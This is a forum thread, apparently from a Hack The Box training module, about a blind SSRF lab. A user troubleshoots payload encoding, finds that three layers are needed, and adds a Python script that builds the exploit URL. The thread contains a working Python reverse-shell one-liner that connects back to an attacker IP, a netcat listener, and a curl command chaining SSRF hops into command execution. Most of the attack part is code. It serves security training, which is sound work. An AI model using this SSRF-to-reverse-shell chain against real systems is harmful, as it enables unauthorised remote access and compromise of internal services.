SERVER-SIDE ATTACKS Blind SSRF Exploitation Example

Hey, I’m trying to complete Blind SSRF Exploitation Example, but I can’t create a reverse shell to my netcat. Btw, I’m using my local Kali machine, not Pwnbox, but on Pwnbox I’m having the same problem.

  1. I’ve twice encoded the Python reverse shell from the module.

Reverse shell before encoding:

export RHOST="10.10.15.192";export RPORT="9999";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
  2. Run netcat -nlvp 9999

  3. curl -i -s "http://10.129.41.183/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=python%2520-c%2520%2527import%2520sys%252Csocket%252Cos%252Cpty%253Bs%253Dsocket.socket%2528%2529%253Bs.connect%2528%2528os.getenv%2528%252210.10.15.192%2522%2529%252Cint%2528os.getenv%2528%25229999%2522%2529%2529%2529%2529%253B%255Bos.dup2%2528s.fileno%2528%2529%252Cfd%2529%2520for%2520fd%2520in%2520%25280%252C1%252C2%2529%255D%253Bpty.spawn%2528%2522%252Fbin%252Fsh%2522%2529%2527"

  4. I’m getting this response (“URL can’t contain control characters”):
    <html><body><h1>Resource: http://127.0.0.1:5000/runme?x=python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'</h1><a>URL can't contain control characters. '/runme?x=python -c \'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("10.10.15.192"),int(os.getenv("9999"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\'' (found at least ' ')</a></body></html>

and nothing happens.

Can anyone help me please?

Ok, never mind. I finally did it. I don’t know why the author said that you need to encode the payload twice. You actually need to encode the payload 3 times.
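To see why the third layer is needed, here is an added example (my own code, not from the original post or from the HTB module) that simulates the chain of hops in the thread. Each hop reads its `q` parameter, percent-decodes it once (what any web framework does when it parses a query string) and issues the result as its next request, so one layer of encoding is consumed per hop; and `http.client` refuses to send a URL that still contains a raw space, which is exactly the "URL can't contain control characters" error above. The host names and the `/load?q=` and `/runme?x=` endpoints are taken from the curl command in the thread (plain `http://` nesting is used, not the `http::////` form from the post); the assumption that every hop decodes exactly once and that the final service decodes `x` once more is mine. The simulation generalizes beyond the thread: a payload that has to cross N hops needs N+1 encodings, so the two-hop chain here needs three.

```python
"""
Simulate a chain of SSRF hops and count how many layers of percent-encoding a
payload needs to reach the innermost service intact.
"""
import re
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Hosts as they appear in the thread; order is outermost hop first.
CHAIN = [
    "http://10.129.41.183/load?q=",       # external app, reachable from the attacker
    "http://internal.app.local/load?q=",  # internal app, reached only via the first hop
]
FINAL = "http://127.0.0.1:5000/runme?x="  # command sink behind the internal app

# Constructed payload in the shape of the module's one-liner (host and port are
# the values from the thread; RHOST/RPORT are read back with os.getenv).
RHOST, RPORT = "10.10.15.192", "9999"
REVERSE_SHELL = (
    f'export RHOST="{RHOST}";export RPORT="{RPORT}";'
    "python -c 'import sys,socket,os,pty;s=socket.socket();"
    's.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));'
    '[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")\''
)

# http.client refuses to send a request whose URL contains any of these bytes;
# that is the "URL can't contain control characters" error from the thread.
CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def encode_layers(payload: str, layers: int) -> str:
    """Percent-encode `payload` `layers` times. safe='' also encodes '/', ':',
    '?', '=' and '&', so no hop can mistake the payload for URL structure."""
    for _ in range(layers):
        payload = quote(payload, safe="")
    return payload


def build_url(payload: str, layers: int, chain=CHAIN) -> str:
    """Nest the final request inside every hop of `chain`, outermost hop last."""
    url = FINAL + encode_layers(payload, layers)
    for prefix in reversed(chain):
        url = prefix + url
    return url


def raw_param(url: str, name: str) -> str:
    """Return the still-encoded value of `name`. Split on the first '?' and on
    'name=' only once, so nested URLs carrying their own '?' and '=' stay whole."""
    query = url.split("?", 1)[1]
    return query.split(name + "=", 1)[1]


def simulate_chain(url: str, hops: int) -> str:
    """Walk `hops` SSRF hops. Each hop decodes its `q` value once and sends the
    result as its own request (one encoding layer consumed per hop). Raises
    ValueError, as http.client does, if a hop is about to request a URL that
    still contains a raw space or other control character."""
    for _ in range(hops):
        url = unquote(raw_param(url, "q"))
        if CONTROL_CHARS.search(url):
            raise ValueError("URL can't contain control characters")
    return url  # the request the last hop sends to FINAL


def command_received(url: str) -> str:
    """What the innermost service executes: its framework decodes `x` once more."""
    return parse_qs(urlsplit(url).query)["x"][0]


def layers_needed(payload: str, chain=CHAIN) -> int:
    """Smallest number of encodings that delivers `payload` unchanged."""
    for layers in range(1, len(chain) + 3):
        try:
            url = simulate_chain(build_url(payload, layers, chain), len(chain))
        except ValueError:
            continue  # a hop saw a raw space: one layer too few
        if command_received(url) == payload:
            return layers
    raise RuntimeError("no encoding depth delivers the payload")


if __name__ == "__main__":
    depth = layers_needed(REVERSE_SHELL)
    print(f"layers needed for the two-hop chain: {depth}")
    print(build_url(REVERSE_SHELL, depth))
```

With two encodings the second hop decodes down to the raw command and refuses to send it, which is the response pasted above; with three, the second hop still sees `python%20-c%20...`, a valid URL, and only the `runme` endpoint turns it back into a command. One more thing worth checking in the decoded payload echoed in that error: the host and port were passed to `os.getenv()` directly instead of being set with `export`, so `os.getenv("10.10.15.192")` would return `None` even once the encoding depth is right. The example above keeps the module's `export RHOST=...; os.getenv("RHOST")` form.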
